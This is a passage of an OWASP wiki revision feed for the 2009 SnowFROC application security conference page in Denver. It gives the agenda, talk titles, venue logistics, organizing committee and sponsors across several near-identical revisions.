 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54195</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54195"/>
				<updated>2009-02-13T18:29:45Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: Undo revision 54194 by Eduprey (Talk)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: Everything in its place&amp;quot;]]&lt;br /&gt;
''David Byrne, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
*taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54194</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=54194"/>
				<updated>2009-02-13T18:29:13Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: Undo revision 54191 by Dc (Talk)&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
This year we again present a full day, '''FREE''' multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;The Top Ten Hacks of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot; (Tool Release!) &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: Choosing the right tool for the job&amp;quot;]]&lt;br /&gt;
''David Byrne, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://www.tivoli.org/tivoli/ Tivoli Student Union, Denver, CO USA]&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP negotiated discounted rates at one or more hotels near the conference venue.  Please email snowfroc@owasp.org for questions regarding accomodation.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?f=q&amp;amp;hl=en&amp;amp;q=tivoli+denver&amp;amp;ie=UTF8&amp;amp;ll=39.74785,-104.990931&amp;amp;spn=0.040189,0.061626&amp;amp;z=14&amp;amp;iwloc=A map].&lt;br /&gt;
&lt;br /&gt;
By taxi:&lt;br /&gt;
